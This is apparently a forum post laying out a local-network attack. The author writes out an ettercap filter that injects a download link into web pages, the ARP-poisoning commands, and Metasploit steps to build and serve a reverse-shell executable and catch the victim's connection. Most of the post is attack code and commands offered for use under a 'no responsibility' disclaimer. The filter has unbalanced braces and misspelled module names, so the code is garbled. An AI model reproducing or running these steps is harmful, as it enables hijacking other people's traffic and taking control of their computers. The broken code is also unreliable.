take a look at the filter, look at what is being replaced... its sort of html injection on the fly
if any one wants to see a quick video i can post one to give you a better idea

what i did was create a reverse meteperter executable then hosted it on a server and did
some arp poisoning with some html injection and you could use this to trick people into
downloading the .exe and get your self a shell

this is just a proof of concept and i take no responsibility

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
           replace("Accept-Encoding", "Accept-Nothing!");

if (ip.proto == TCP && tcp.src == 80) {
      if (search(DATA.data, "<title>")) {
           replace("</title>", "</title><form action="" method="link"><img src=""><INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form><html><body><h10>just some instructions</h10></body></html>");
           msg("html injected");
i think this is the working filter

-create the meterpeter.exe-
(open msfconsole)
./msfpayload windows/meterpeter/reverse_tcp LHOST= LPORT=100 x > meterpeter.exe
Now place the executable into your Apache root directory

-set up your listener-
use exploit/multi/handler
set PAYLOAD windows/meterpeter/reverse_tcp
set LPORT 100

-execute ettercap-
etterfilter html.filter -o html.ef
ettercap -T -q -F html.ef -M ARP // //

now wait for some one on the network to download and execute meterpeter.exe and you will have a reverse shell

Let me know what you think